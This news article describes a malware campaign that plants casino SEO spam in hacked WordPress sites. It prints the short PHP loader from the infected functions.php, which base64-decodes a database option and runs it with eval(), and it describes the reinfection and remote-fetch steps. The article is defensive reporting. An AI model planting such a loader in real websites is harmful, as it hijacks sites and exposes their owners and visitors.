Cybercriminals Exploit Website Vulnerabilities to Boost Malicious SEO Rankings
In a concerning trend, cybercriminals are increasingly compromising websites to inject malicious links, aiming to enhance their search engine optimization (SEO) rankings through blackhat tactics. This campaign predominantly focuses on online casino spam, which has become the most prevalent type of spam content affecting compromised websites.
Exploitation of WordPress Vulnerabilities
Attackers are exploiting vulnerabilities in WordPress installations to insert spam content promoting online casinos, particularly targeting international markets where gambling remains heavily regulated. By hijacking legitimate website pages, they create duplicate directories with identical names, effectively replacing original content with spam-filled landing pages. This technique exploits how Apache and Nginx web servers resolve filesystem paths before handing requests to WordPress rewrite engines.
Advanced Malware Techniques
Sucuri security researchers have identified a sophisticated variant of this malware that incorporates multiple layers of redundancy. The malicious code is strategically planted in both theme and plugin files to ensure survival even if one component is discovered. Rather than creating easily detectable spam directories, this advanced version stores its payload within the WordPress database using deceptive option names.
Multi-Layered Infection Mechanism
The infection operates through clever database manipulation and dynamic content fetching. Researchers discovered malicious code embedded at the bottom of the theme’s functions.php file. The code retrieves a base64-encoded payload from the database using the option name wp_footers_logic and executes it through PHP’s eval() function:
“`php
$cloak = get_option(‘wp_footers_logic’);
if ($cloak) {
$decoded = base64_decode($cloak);
eval($decoded);
}
“`
If eval() is disabled, the malware writes the payload to wp-content/cache/style.dat as a fallback mechanism. The decoded payload monitors incoming requests for specific URL paths, checking for cached spam content. When triggered, it fetches content from attacker-controlled domains like browsec[.]xyz. To ensure persistence, attackers plant reinfection code in additional plugin files. This code periodically searches for distinctive markers. If markers are missing, the code automatically reappends the malicious payload to both the theme’s functions.php file and the primary file of the first active plugin, demonstrating sophisticated SEO spam campaigns.
Implications and Recommendations
The implications of such attacks are far-reaching. Compromised websites not only suffer from degraded SEO rankings but also risk being blacklisted by search engines, leading to a significant loss of traffic and credibility. Moreover, visitors to these sites may be redirected to malicious content, exposing them to potential security threats.
To mitigate these risks, website administrators are advised to:
– Regularly Update Software: Ensure that all website components, including WordPress core, themes, and plugins, are up to date to patch known vulnerabilities.
– Implement Strong Security Measures: Utilize security plugins and firewalls to detect and prevent unauthorized access.
– Conduct Routine Security Audits: Regularly scan the website for signs of compromise and unauthorized changes.
– Educate Users: Inform users about the risks of clicking on suspicious links and the importance of verifying website authenticity.
By adopting these practices, website owners can enhance their defenses against such malicious SEO campaigns and protect their online presence.
